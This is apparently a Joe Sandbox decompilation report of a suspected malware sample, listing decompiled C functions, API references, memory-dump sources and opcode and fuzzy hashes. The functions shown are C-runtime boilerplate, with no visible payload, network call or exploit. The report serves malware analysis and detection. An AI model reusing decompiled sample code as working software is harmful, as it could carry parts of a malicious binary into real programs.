                          0x004082e5
                          0x004082eb
                          0x004082f1
                          0x00000000
                          0x004082f1
                          0x004082eb
                          0x004082d3
                          0x004082a4
                          0x004082a8
                          0x004082ab
                          0x004082b1
                          0x004082b3
                          0x004082b6
                          0x004082ba
                          0x004082f7
                          0x004082fa
                          0x004082fb
                          0x00408300
                          0x00408306
                          0x0040830c
                          0x0040831b
                          0x00408321
                          0x00408327
                          0x0040832c
                          0x00408348
                          0x004083bb
                          0x004083c1
                          0x0040834a
                          0x00408352
                          0x0040835b
                          0x00408361
                          0x00000000
                          0x00408363
                          0x00408365
                          0x00408368
                          0x00408381
                          0x00000000
                          0x00408383
                          0x00408387
                          0x00408389
                          0x0040838c
                          0x00000000
                          0x0040838c
                          0x00408387
                          0x00408381
                          0x00408361
                          0x0040835b
                          0x00408348
                          0x0040832c
                          0x00408306
                          0x00000000
                          0x0040838f
                          0x0040838f
                          0x004083c3
                          0x004083cd
                          0x004083d5

                          APIs
                          • GetConsoleCP.KERNEL32(?,00000000,?,?,?,?,?,?,?,00408998,?,00000000,?,00000000,00000000), ref: 00408265
                          • __fassign.LIBCMT ref: 004082E0
                          • __fassign.LIBCMT ref: 004082FB
                          • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,?,00000005,00000000,00000000), ref: 00408321
                          • WriteFile.KERNEL32(?,?,00000000,00408998,00000000,?,?,?,?,?,?,?,?,?,00408998,?), ref: 00408340
                          • WriteFile.KERNEL32(?,?,00000001,00408998,00000000,?,?,?,?,?,?,?,?,?,00408998,?), ref: 00408379
                          Memory Dump Source
                          • Source File: 00000006.00000001.718924677.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000006.00000001.718977051.0000000000414000.00000040.00020000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_6_1_400000_rstmgknbahw.jbxd
                          Yara matches
                          Similarity
                          • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                          • String ID:
                          • API String ID: 1324828854-0
                          • Opcode ID: 6526cd7982371344a6a1e48cd2b7cf140f34c910ae76ba14c8618a3c70808cc2
                          • Instruction ID: d35ea3bc0149cbeaf608d2e35f82b202305ea3b4574a465905668c698b2cd014
                          • Opcode Fuzzy Hash: 6526cd7982371344a6a1e48cd2b7cf140f34c910ae76ba14c8618a3c70808cc2
                          • Instruction Fuzzy Hash: 2751C070900209EFCB10CFA8D985AEEBBF4EF49300F14816EE995F3391DA349941CB68
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 27%
                          			E00403632(void* __ecx, intOrPtr _a4) {
                          				signed int _v8;
                          				signed int _v12;
                          				signed int _t10;
                          				int _t12;
                          				int _t18;
                          				signed int _t20;
                          
                          				_t10 =  *0x412014; // 0xc066fb75
                          				_v8 = _t10 ^ _t20;
                          				_v12 = _v12 & 0x00000000;
                          				_t12 =  &_v12;
                          				__imp__GetModuleHandleExW(0, L"mscoree.dll", _t12, __ecx, __ecx);
                          				if(_t12 != 0) {
                          					_t12 = GetProcAddress(_v12, "CorExitProcess");
                          					_t18 = _t12;
                          					if(_t18 != 0) {
                          						E0040C15C();
                          						_t12 =  *_t18(_a4);
                          					}
                          				}
                          				if(_v12 != 0) {
                          					_t12 = FreeLibrary(_v12);
                          				}
                          				E004018CC();
                          				return _t12;
                          			}









                          0x00403639
                          0x00403640
                          0x00403643
                          0x00403647
                          0x00403652
                          0x0040365a
                          0x00403665
                          0x0040366b
                          0x0040366f
                          0x00403676
                          0x0040367c
                          0x0040367c
                          0x0040367e
                          0x00403683
                          0x00403688
                          0x00403688
                          0x00403693
                          0x0040369b

                          APIs
                          • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00403627,00000003,?,004035C7,00000003,00410EB8,0000000C,004036DA,00000003,00000002), ref: 00403652
                          • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00403665
                          • FreeLibrary.KERNEL32(00000000,?,?,?,00403627,00000003,?,004035C7,00000003,00410EB8,0000000C,004036DA,00000003,00000002,00000000), ref: 00403688
                          Strings
                          Memory Dump Source
                          • Source File: 00000006.00000001.718924677.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000006.00000001.718977051.0000000000414000.00000040.00020000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_6_1_400000_rstmgknbahw.jbxd
                          Yara matches
                          Similarity
                          • API ID: AddressFreeHandleLibraryModuleProc
                          • String ID: CorExitProcess$mscoree.dll
                          • API String ID: 4061214504-1276376045
                          • Opcode ID: 829d2906a4e1aa3164176bf7ab706f29f81f0af0ee9c7b1f46b6600de564c79c
                          • Instruction ID: 2a5f1b52f49e2644cdc997ca28138b4c7ff7fe3d24fc8903f8dd75b8825c5772
                          • Opcode Fuzzy Hash: 829d2906a4e1aa3164176bf7ab706f29f81f0af0ee9c7b1f46b6600de564c79c
                          • Instruction Fuzzy Hash: D7F0A431A0020CFBDB109FA1DD49B9EBFB9EB04711F00427AF805B22A0DB754A40CA98
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 79%
                          			E004062B8(void* __edx, void* __eflags, intOrPtr _a4, int _a8, char* _a12, int _a16, short* _a20, int _a24, intOrPtr _a28) {
                          				signed int _v8;
                          				int _v12;
                          				char _v16;
                          				intOrPtr _v24;
                          				char _v28;
                          				void* _v40;
                          				void* __ebx;
                          				void* __edi;
                          				signed int _t34;
                          				signed int _t40;
                          				int _t45;
                          				int _t52;
                          				void* _t53;
                          				void* _t55;
                          				int _t57;
                          				signed int _t63;
                          				int _t67;
                          				short* _t71;
                          				signed int _t72;
                          				short* _t73;
                          
                          				_t34 =  *0x412014; // 0xc066fb75
                          				_v8 = _t34 ^ _t72;
                          				_push(_t53);
                          				E00403F2B(_t53,  &_v28, __edx, _a4);
                          				_t57 = _a24;
                          				if(_t57 == 0) {
                          					_t52 =  *(_v24 + 8);
                          					_t57 = _t52;
                          					_a24 = _t52;
                          				}
                          				_t67 = 0;
                          				_t40 = MultiByteToWideChar(_t57, 1 + (0 | _a28 != 0x00000000) * 8, _a12, _a16, 0, 0);
                          				_v12 = _t40;
                          				if(_t40 == 0) {
                          					L15:
                          					if(_v16 != 0) {
                          						 *(_v28 + 0x350) =  *(_v28 + 0x350) & 0xfffffffd;
                          					}
                          					E004018CC();
                          					return _t67;
                          				}
                          				_t55 = _t40 + _t40;
                          				_t17 = _t55 + 8; // 0x8
                          				asm("sbb eax, eax");
                          				if((_t17 & _t40) == 0) {
                          					_t71 = 0;
                          					L11:
                          					if(_t71 != 0) {
                          						E00402460(_t67, _t71, _t67, _t55);
                          						_t45 = MultiByteToWideChar(_a24, 1, _a12, _a16, _t71, _v12);
                          						if(_t45 != 0) {
                          							_t67 = GetStringTypeW(_a8, _t71, _t45, _a20);
                          						}
                          					}
                          					L14:
                          					E004063D5(_t71);
                          					goto L15;
                          				}
                          				_t20 = _t55 + 8; // 0x8
                          				asm("sbb eax, eax");
                          				_t47 = _t40 & _t20;
                          				_t21 = _t55 + 8; // 0x8
                          				_t63 = _t21;
                          				if((_t40 & _t20) > 0x400) {
                          					asm("sbb eax, eax");
                          					_t71 = E00403E3D(_t63, _t47 & _t63);
                          					if(_t71 == 0) {
                          						goto L14;
                          					}
                          					 *_t71 = 0xdddd;
                          					L9:
                          					_t71 =  &(_t71[4]);
                          					goto L11;
                          				}
                          				asm("sbb eax, eax");
                          				E004018E0();
                          				_t71 = _t73;
                          				if(_t71 == 0) {
                          					goto L14;
                          				}
                          				 *_t71 = 0xcccc;
                          				goto L9;
                          			}























                          0x004062c0
                          0x004062c7
                          0x004062ca
                          0x004062d3
                          0x004062d8
                          0x004062dd
                          0x004062e2
                          0x004062e5
                          0x004062e7
                          0x004062e7
                          0x004062ec
                          0x00406305
                          0x0040630b
                          0x00406310
                          0x004063af
                          0x004063b3
                          0x004063b8
                          0x004063b8
                          0x004063cc
                          0x004063d4
                          0x004063d4
                          0x00406316
                          0x00406319
                          0x0040631e
                          0x00406322
                          0x0040636e
                          0x00406370
                          0x00406372
                          0x00406377
                          0x0040638e
                          0x00406396
                          0x004063a6
                          0x004063a6
                          0x00406396
                          0x004063a8
                          0x004063a9
                          0x00000000
                          0x004063ae
                          0x00406324
                          0x00406329
                          0x0040632b
                          0x0040632d
                          0x0040632d
                          0x00406335
                          0x00406352
                          0x0040635c
                          0x00406361
                          0x00000000
                          0x00000000
                          0x00406363
                          0x00406369
                          0x00406369
                          0x00000000
                          0x00406369
                          0x00406339
                          0x0040633d
                          0x00406342
                          0x00406346
                          0x00000000
                          0x00000000
                          0x00406348
                          0x00000000

                          APIs
                          • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000100,?,00000000,?,?,00000000), ref: 00406305
                          • __alloca_probe_16.LIBCMT ref: 0040633D
                          • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0040638E
                          • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 004063A0
                          • __freea.LIBCMT ref: 004063A9
                            • Part of subcall function 00403E3D: RtlAllocateHeap.NTDLL(00000000,?,00000004,?,00407C67,?,00000000,?,004067DA,?,00000004,?,?,?,?,00403B03), ref: 00403E6F
                          Memory Dump Source
                          • Source File: 00000006.00000001.718924677.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000006.00000001.718977051.0000000000414000.00000040.00020000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_6_1_400000_rstmgknbahw.jbxd
                          Yara matches
                          Similarity
                          • API ID: ByteCharMultiWide$AllocateHeapStringType__alloca_probe_16__freea
                          • String ID:
                          • API String ID: 313313983-0
                          • Opcode ID: 3668a24b8cc91a8edc8bb6444902db7ad8a914eb3222a5b1c35fe0f4f695b84c
                          • Instruction ID: a1348b344bfdb8beedea85c2379656fd8e164ea4191dcb9080565a587d22e55f
                          • Opcode Fuzzy Hash: 3668a24b8cc91a8edc8bb6444902db7ad8a914eb3222a5b1c35fe0f4f695b84c
                          • Instruction Fuzzy Hash: AE31B072A0020AABDF249F65DC85DAF7BA5EF40310B05423EFC05E6290E739CD65DB94
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 95%
                          			E00405751(signed int _a4) {
                          				signed int _t9;
                          				void* _t13;
                          				signed int _t15;
                          				WCHAR* _t22;
                          				signed int _t24;
                          				signed int* _t25;
                          				void* _t27;
                          
                          				_t9 = _a4;
                          				_t25 = 0x412fc8 + _t9 * 4;
                          				_t24 =  *_t25;
                          				if(_t24 == 0) {
                          					_t22 =  *(0x40cd48 + _t9 * 4);
                          					_t27 = LoadLibraryExW(_t22, 0, 0x800);
                          					if(_t27 != 0) {
                          						L8:
                          						 *_t25 = _t27;
                          						if( *_t25 != 0) {
                          							FreeLibrary(_t27);
                          						}
                          						_t13 = _t27;
                          						L11:
                          						return _t13;
                          					}
                          					_t15 = GetLastError();
                          					if(_t15 != 0x57) {
                          						_t27 = 0;
                          					} else {
                          						_t15 = LoadLibraryExW(_t22, _t27, _t27);
                          						_t27 = _t15;
                          					}
                          					if(_t27 != 0) {
                          						goto L8;
                          					} else {
                          						 *_t25 = _t15 | 0xffffffff;
                          						_t13 = 0;
                          						goto L11;
                          					}
                          				}
                          				_t4 = _t24 + 1; // 0xc066fb76
                          				asm("sbb eax, eax");
                          				return  ~_t4 & _t24;
                          			}










                          0x00405756
                          0x0040575a
                          0x00405761
                          0x00405765
                          0x00405773
                          0x00405789
                          0x0040578d
                          0x004057b6
                          0x004057b8
                          0x004057bc
                          0x004057bf
                          0x004057bf
                          0x004057c5
                          0x004057c7
                          0x00000000
                          0x004057c8
                          0x0040578f
                          0x00405798
                          0x004057a7
                          0x0040579a
                          0x0040579d
                          0x004057a3
                          0x004057a3
                          0x004057ab
                          0x00000000
                          0x004057ad
                          0x004057b0
                          0x004057b2
                          0x00000000
                          0x004057b2
                          0x004057ab
                          0x00405767
                          0x0040576c
                          0x00000000

                          APIs
                          • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00000000,00000000,00000000,?,004056F8,00000000,00000000,00000000,00000000,?,004058F5,00000006,FlsSetValue), ref: 00405783
                          • GetLastError.KERNEL32(?,004056F8,00000000,00000000,00000000,00000000,?,004058F5,00000006,FlsSetValue,0040D200,0040D208,00000000,00000364,?,004043F2), ref: 0040578F
                          • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,004056F8,00000000,00000000,00000000,00000000,?,004058F5,00000006,FlsSetValue,0040D200,0040D208,00000000), ref: 0040579D
                          Memory Dump Source
                          • Source File: 00000006.00000001.718924677.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000006.00000001.718977051.0000000000414000.00000040.00020000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_6_1_400000_rstmgknbahw.jbxd
                          Yara matches
                          Similarity
                          • API ID: LibraryLoad$ErrorLast
                          • String ID:
                          • API String ID: 3177248105-0
                          • Opcode ID: 179fc24cb71fa7b74b78db1aa8efd8080a6824dbe4e2c3e4e777693639d287a7
                          • Instruction ID: a071a87d579bf16c10ed97f701b3afe57148fc5a73c01e838bdae708b7fec84a
                          • Opcode Fuzzy Hash: 179fc24cb71fa7b74b78db1aa8efd8080a6824dbe4e2c3e4e777693639d287a7
                          • Instruction Fuzzy Hash: 2001AC36612622DBD7214BA89D84E577BA8EF45B61F100635FA05F72C0D734D811DEE8
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 71%
                          			E00404320(void* __ebx, void* __ecx, void* __edx) {
                          				void* __edi;
                          				void* __esi;
                          				intOrPtr _t2;
                          				void* _t3;
                          				void* _t4;
                          				intOrPtr _t9;
                          				void* _t11;
                          				void* _t20;
                          				void* _t21;
                          				void* _t23;
                          				void* _t25;
                          				void* _t27;
                          				void* _t29;
                          				void* _t31;
                          				void* _t32;
                          				long _t36;
                          				long _t37;
                          				void* _t40;
                          
                          				_t29 = __edx;
                          				_t23 = __ecx;
                          				_t20 = __ebx;
                          				_t36 = GetLastError();
                          				_t2 =  *0x412064; // 0xffffffff
                          				_t42 = _t2 - 0xffffffff;
                          				if(_t2 == 0xffffffff) {
                          					L2:
                          					_t3 = E00403ECE(_t23, 1, 0x364);
                          					_t31 = _t3;
                          					_pop(_t25);
                          					if(_t31 != 0) {
                          						_t4 = E004058CE(_t25, __eflags,  *0x412064, _t31);
                          						__eflags = _t4;
                          						if(_t4 != 0) {
                          							E00404192(_t25, _t31, 0x4132a4);
                          							E00403E03(0);
                          							_t40 = _t40 + 0xc;
                          							__eflags = _t31;
                          							if(_t31 == 0) {
                          								goto L9;
                          							} else {
                          								goto L8;
                          							}
                          						} else {
                          							_push(_t31);
                          							goto L4;
                          						}
                          					} else {
                          						_push(_t3);
                          						L4:
                          						E00403E03();
                          						_pop(_t25);
                          						L9:
                          						SetLastError(_t36);
                          						E00403E8B(_t20, _t29, _t31, _t36);
                          						asm("int3");
                          						_push(_t20);
                          						_push(_t36);
                          						_push(_t31);
                          						_t37 = GetLastError();
                          						_t21 = 0;
                          						_t9 =  *0x412064; // 0xffffffff
                          						_t45 = _t9 - 0xffffffff;
                          						if(_t9 == 0xffffffff) {
                          							L12:
                          							_t32 = E00403ECE(_t25, 1, 0x364);
                          							_pop(_t27);
                          							if(_t32 != 0) {
                          								_t11 = E004058CE(_t27, __eflags,  *0x412064, _t32);
                          								__eflags = _t11;
                          								if(_t11 != 0) {
                          									E00404192(_t27, _t32, 0x4132a4);
                          									E00403E03(_t21);
                          									__eflags = _t32;
                          									if(_t32 != 0) {
                          										goto L19;
                          									} else {
                          										goto L18;
                          									}
                          								} else {
                          									_push(_t32);
                          									goto L14;
                          								}
                          							} else {
                          								_push(_t21);
                          								L14:
                          								E00403E03();
                          								L18:
                          								SetLastError(_t37);
                          							}
                          						} else {
                          							_t32 = E00405878(_t25, _t45, _t9);
                          							if(_t32 != 0) {
                          								L19:
                          								SetLastError(_t37);
                          								_t21 = _t32;
                          							} else {
                          								goto L12;
                          							}
                          						}
                          						return _t21;
                          					}
                          				} else {
                          					_t31 = E00405878(_t23, _t42, _t2);
                          					if(_t31 != 0) {
                          						L8:
                          						SetLastError(_t36);
                          						return _t31;
                          					} else {
                          						goto L2;
                          					}
                          				}
                          			}





















                          0x00404320
                          0x00404320
                          0x00404320
                          0x0040432a
                          0x0040432c
                          0x00404331
                          0x00404334
                          0x00404342
                          0x00404349
                          0x0040434e
                          0x00404351
                          0x00404354
                          0x00404366
                          0x0040436b
                          0x0040436d
                          0x00404378
                          0x0040437f
                          0x00404384
                          0x00404387
                          0x00404389
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x0040436f
                          0x0040436f
                          0x00000000
                          0x0040436f
                          0x00404356
                          0x00404356
                          0x00404357
                          0x00404357
                          0x0040435c
                          0x00404397
                          0x00404398
                          0x0040439e
                          0x004043a3
                          0x004043a6
                          0x004043a7
                          0x004043a8
                          0x004043af
                          0x004043b1
                          0x004043b3
                          0x004043b8
                          0x004043bb
                          0x004043c9
                          0x004043d5
                          0x004043d8
                          0x004043db
                          0x004043ed
                          0x004043f2
                          0x004043f4
                          0x004043ff
                          0x00404405
                          0x0040440d
                          0x0040440f
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x004043f6
                          0x004043f6
                          0x00000000
                          0x004043f6
                          0x004043dd
                          0x004043dd
                          0x004043de
                          0x004043de
                          0x00404411
                          0x00404412
                          0x00404412
                          0x004043bd
                          0x004043c3
                          0x004043c7
                          0x0040441a
                          0x0040441b
                          0x00404421
                          0x00000000
                          0x00000000
                          0x00000000
                          0x004043c7
                          0x00404428
                          0x00404428
                          0x00404336
                          0x0040433c
                          0x00404340
                          0x0040438b
                          0x0040438c
                          0x00404396
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00404340

                          APIs
                          • GetLastError.KERNEL32(?,?,004037D2,?,?,004016EA,00000000,?,00410E40), ref: 00404324
                          • SetLastError.KERNEL32(00000000,?,?,004016EA,00000000,?,00410E40), ref: 0040438C
                          • SetLastError.KERNEL32(00000000,?,?,004016EA,00000000,?,00410E40), ref: 00404398
                          • _abort.LIBCMT ref: 0040439E
                          Memory Dump Source
                          • Source File: 00000006.00000001.718924677.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000006.00000001.718977051.0000000000414000.00000040.00020000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_6_1_400000_rstmgknbahw.jbxd
                          Yara matches
                          Similarity
                          • API ID: ErrorLast$_abort
                          • String ID:
                          • API String ID: 88804580-0
                          • Opcode ID: 62ede4f37894db3567f5427a1490bbed1412223467fdb5f37ac402c07740c3c0
                          • Instruction ID: 10f1ed76ee289f7058500775698c1b2aead1ecf844b9f3100802fdeea25ad27f
                          • Opcode Fuzzy Hash: 62ede4f37894db3567f5427a1490bbed1412223467fdb5f37ac402c07740c3c0
                          • Instruction Fuzzy Hash: 75F0A976204701A6C21237769D0AB6B2A1ACBC1766F25423BFF18B22D1EF3CCD42859D
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 100%
                          			E004025BA() {
                          				void* _t4;
                          				void* _t8;
                          
                          				E00402AE5();
                          				E00402A79();
                          				if(E004027D9() != 0) {
                          					_t4 = E0040278B(_t8, __eflags);
                          					__eflags = _t4;
                          					if(_t4 != 0) {
                          						return 1;
                          					} else {
                          						E00402815();
                          						goto L1;
                          					}
                          				} else {
                          					L1:
                          					return 0;
                          				}
                          			}





                          0x004025ba
                          0x004025bf
                          0x004025cb
                          0x004025d0
                          0x004025d5
                          0x004025d7
                          0x004025e2
                          0x004025d9
                          0x004025d9
                          0x00000000
                          0x004025d9
                          0x004025cd
                          0x004025cd
                          0x004025cf
                          0x004025cf

                          APIs
                          • ___vcrt_initialize_pure_virtual_call_handler.LIBVCRUNTIME ref: 004025BA
                          • ___vcrt_initialize_winapi_thunks.LIBVCRUNTIME ref: 004025BF
                          • ___vcrt_initialize_locks.LIBVCRUNTIME ref: 004025C4
                            • Part of subcall function 004027D9: ___vcrt_InitializeCriticalSectionEx.LIBVCRUNTIME ref: 004027EA
                          • ___vcrt_uninitialize_locks.LIBVCRUNTIME ref: 004025D9
                          Memory Dump Source
                          • Source File: 00000006.00000001.718924677.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000006.00000001.718977051.0000000000414000.00000040.00020000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_6_1_400000_rstmgknbahw.jbxd
                          Yara matches
                          Similarity
                          • API ID: CriticalInitializeSection___vcrt____vcrt_initialize_locks___vcrt_initialize_pure_virtual_call_handler___vcrt_initialize_winapi_thunks___vcrt_uninitialize_locks
                          • String ID:
                          • API String ID: 1761009282-0
                          • Opcode ID: 25f408f13cbe0c40dd9f497db491c4efe3e5092114ef2f2bbff8929357b925fc
                          • Instruction ID: 4128bea016199bb2a2d03f508bec19fe8aa18f4adc422371eefe93b2158e2da6
                          • Opcode Fuzzy Hash: 25f408f13cbe0c40dd9f497db491c4efe3e5092114ef2f2bbff8929357b925fc
                          • Instruction Fuzzy Hash: E0C0024414014264DC6036B32F2E5AA235409A63CDBD458BBA951776C3ADFD044A553E
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 100%
                          			E00405575() {
                          
                          				 *0x412e78 = GetCommandLineA();
                          				 *0x412e7c = GetCommandLineW();
                          				return 1;
                          			}



                          0x0040557b
                          0x00405586
                          0x0040558d

                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000006.00000002.734234340.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_6_2_400000_rstmgknbahw.jbxd
                          Yara matches
                          Similarity
                          • API ID: CommandLine
                          • String ID: 3_
                          • API String ID: 3253501508-3952000457
                          • Opcode ID: 5876c0817ba34097e06c4a717b2c5bc39c627040ca7456eb6673a9cffb0a1105
                          • Instruction ID: 265b5206e6e9c5440433cfe38bbdb56a7b23962a2c49d0f47ff6119da82ef27c
                          • Opcode Fuzzy Hash: 5876c0817ba34097e06c4a717b2c5bc39c627040ca7456eb6673a9cffb0a1105
                          • Instruction Fuzzy Hash: 24B09278800300CFD7008FB0BB8C0843BA0B2382023A09175D511D2320D6F40060DF4C
                          Uniqueness

                          Uniqueness Score: -1.00%